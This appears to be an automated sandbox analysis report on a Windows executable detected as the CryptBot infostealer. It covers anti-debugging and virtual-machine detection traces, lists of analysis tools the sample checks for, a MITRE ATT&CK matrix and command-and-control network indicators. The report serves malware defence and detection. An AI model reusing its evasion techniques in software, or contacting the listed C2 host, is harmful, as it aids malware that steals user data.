Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590E33 second address: 7590E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590E42 second address: 7590E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7590E48 second address: 7590E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7530134 second address: 7530159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4464DAB8CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D05B8 second address: 74D05BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D05BC second address: 74D05D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D05D7 second address: 74D05FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D05FE second address: 74D0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D0A21 second address: 74D0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 74D0A25 second address: 74D0A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75208AD second address: 7520959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4464F4BF28h 0x00000009 and cx, B758h 0x0000000e jmp 00007F4464F4BF1Bh 0x00000013 popfd 0x00000014 call 00007F4464F4BF28h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push esi 0x0000001e pushad 0x0000001f mov esi, 0754D393h 0x00000024 pushad 0x00000025 mov ecx, 32DBDB85h 0x0000002a pushfd 0x0000002b jmp 00007F4464F4BF22h 0x00000030 or ax, 7C18h 0x00000035 jmp 00007F4464F4BF1Bh 0x0000003a popfd 0x0000003b popad 0x0000003c popad 0x0000003d mov dword ptr [esp], ebp 0x00000040 jmp 00007F4464F4BF26h 0x00000045 mov ebp, esp 0x00000047 pushad 0x00000048 mov edi, eax 0x0000004a mov dx, ax 0x0000004d popad 0x0000004e pop ebp 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F4464F4BF1Bh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7500054 second address: 75000D5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4464DAB8CEh 0x00000008 xor ecx, 49E5D518h 0x0000000e jmp 00007F4464DAB8CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F4464DAB8D1h 0x00000023 sbb si, CEB6h 0x00000028 jmp 00007F4464DAB8D1h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F4464DAB8D0h 0x00000034 and ax, 59D8h 0x00000039 jmp 00007F4464DAB8CBh 0x0000003e popfd 0x0000003f popad 0x00000040 and esp, FFFFFFF0h 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75000D5 second address: 75000D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75000D9 second address: 75000F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75000F4 second address: 75001E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c pushad 0x0000000d mov cx, C3F3h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 mov eax, 0BE0D647h 0x00000019 push ecx 0x0000001a jmp 00007F4464F4BF23h 0x0000001f pop eax 0x00000020 popad 0x00000021 mov dword ptr [esp], ebx 0x00000024 jmp 00007F4464F4BF1Fh 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b mov si, E03Bh 0x0000002f movzx eax, di 0x00000032 popad 0x00000033 push eax 0x00000034 jmp 00007F4464F4BF1Ah 0x00000039 xchg eax, esi 0x0000003a jmp 00007F4464F4BF20h 0x0000003f xchg eax, edi 0x00000040 jmp 00007F4464F4BF20h 0x00000045 push eax 0x00000046 pushad 0x00000047 movsx ebx, ax 0x0000004a mov di, cx 0x0000004d popad 0x0000004e xchg eax, edi 0x0000004f jmp 00007F4464F4BF24h 0x00000054 mov edi, dword ptr [ebp+08h] 0x00000057 pushad 0x00000058 mov al, 93h 0x0000005a mov si, bx 0x0000005d popad 0x0000005e mov dword ptr [esp+24h], 00000000h 0x00000066 jmp 00007F4464F4BF25h 0x0000006b lock bts dword ptr [edi], 00000000h 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F4464F4BF28h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75001E6 second address: 75001F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464DAB8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75301F3 second address: 75301F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75301F7 second address: 75301FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75301FD second address: 753024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4464F4BF1Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov al, CAh 0x00000013 pushfd 0x00000014 jmp 00007F4464F4BF21h 0x00000019 sub ch, 00000076h 0x0000001c jmp 00007F4464F4BF21h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 pushad 0x00000027 mov ch, 95h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75207D1 second address: 75207FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C894h 0x00000007 mov ebx, 1CC6DA00h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007F4464DAB8D4h 0x00000015 mov dword ptr [esp], ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 75207FE second address: 7520804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7520804 second address: 752082A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, CA51h 0x00000007 movzx eax, dx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 6CFEE9C1h 0x00000017 jmp 00007F4464DAB8CEh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 752082A second address: 7520840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4464F4BF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	RDTSC instruction interceptor: First address: 7520840 second address: 7520846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Special instruction interceptor: First address: 14E1A65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Special instruction interceptor: First address: 14DF0A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Special instruction interceptor: First address: 168E4E5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Special instruction interceptor: First address: 171D508 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened / queried: C:\Users\user\SystemResources\HGFSqmKwd5.exe.mun	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened / queried: C:\Users\user\Desktop\HGFSqmKwd5.exe	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened / queried: C:\Users\user\Desktop\HGFSqmKwd5.exe.Local\	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe TID: 8080

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_00E0255D
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_00E029FF

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Code function: 0_2_00E0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00E0255D

Source: HGFSqmKwd5.exe, HGFSqmKwd5.exe, 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ShimDebugLog_HGFSqmKwd5.exe_8076.txt
Source: HGFSqmKwd5.exe, 00000000.00000003.1394356643.0000000007720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GDI+ Window (HGFSqmKwd5.exe)\
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: HGFSqmKwd5.exe, 00000000.00000003.1391613582.0000000006DA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlS?e
Source: HGFSqmKwd5.exe, 00000000.00000002.1484323466.0000000001D45000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1450371284.0000000001D44000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1445287247.0000000001D3A000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1449123584.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HGFSqmKwd5.exe.
Source: HGFSqmKwd5.exe, HGFSqmKwd5.exe, 00000000.00000003.1391680876.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1390406430.0000000006DA1000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1484323466.0000000001D45000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1450371284.0000000001D44000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1445287247.0000000001D3A000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1342596235.00000000071E0000.00000004.00000800.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1449123584.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1389703505.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HGFSqmKwd5.exe
Source: HGFSqmKwd5.exe, 00000000.00000002.1483769279.0000000001BD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Users\user\Desktop\HGFSqmKwd5.exe"C:\Users\user\Desktop\HGFSqmKwd5.exe"C:\Users\user\Desktop\HGFSqmKwd5.exeWinsta0\Default
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_shimengstate_HGFSqmKwd5.exe_8076.txtxR
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\HGFSqmKwd5.exe
Source: HGFSqmKwd5.exe	Binary or memory string: Hyper-V RAW
Source: HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ApphelpDebug_HGFSqmKwd5.exe_8076.txthC
Source: HGFSqmKwd5.exe, 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: }PKNwC:\Users\user\DesktopHGFSqmKwd5.exeRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PN"C:\Users\user\Desktop\HGFSqmKwd5.exe"[
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume3\Users\user\Desktop\HGFSqmKwd5.exe8>
Source: HGFSqmKwd5.exe, 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Users\user\Desktop\HGFSqmKwd5.exe"C:\Users\user\Desktop\HGFSqmKwd5.exe"C:\Users\user\Desktop\HGFSqmKwd5.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsdo
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_DetectorsTrace_HGFSqmKwd5.exe_8076.txt
Source: HGFSqmKwd5.exe, 00000000.00000002.1484323466.0000000001D45000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1450371284.0000000001D44000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1445287247.0000000001D3A000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1449123584.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[d? N(e
Source: HGFSqmKwd5.exe, 00000000.00000002.1483872467.0000000001CA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\Users\user\Desktop\HGFSqmKwd5.exe"

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened: NTICE
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened: SICE
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E01160 SetUnhandledExceptionFilter,	0_2_00E01160
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E011A3 SetUnhandledExceptionFilter,	0_2_00E011A3
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Code function: 0_2_00E013C9 SetUnhandledExceptionFilter,	0_2_00E013C9

Source: HGFSqmKwd5.exe, HGFSqmKwd5.exe, 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HGFSqmKwd5.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\HGFSqmKwd5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.10:49729 -> 81.29.149.125:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	24 Virtualization/Sandbox Evasion	OS Credential Dumping	741 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HGFSqmKwd5.exe	58%	Virustotal		Browse
HGFSqmKwd5.exe	61%	ReversingLabs	Win32.Trojan.CryptBot
HGFSqmKwd5.exe	100%	Avira	TR/Crypt.TPM.Gen
HGFSqmKwd5.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=	0%	Avira URL Cloud	safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
home.fiveth5ht.top	81.29.149.125	true	false	high
httpbin.org	34.226.108.155	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862	false		high
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQ	HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D33000.00000004.00000020.00020000.00000000.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17	HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
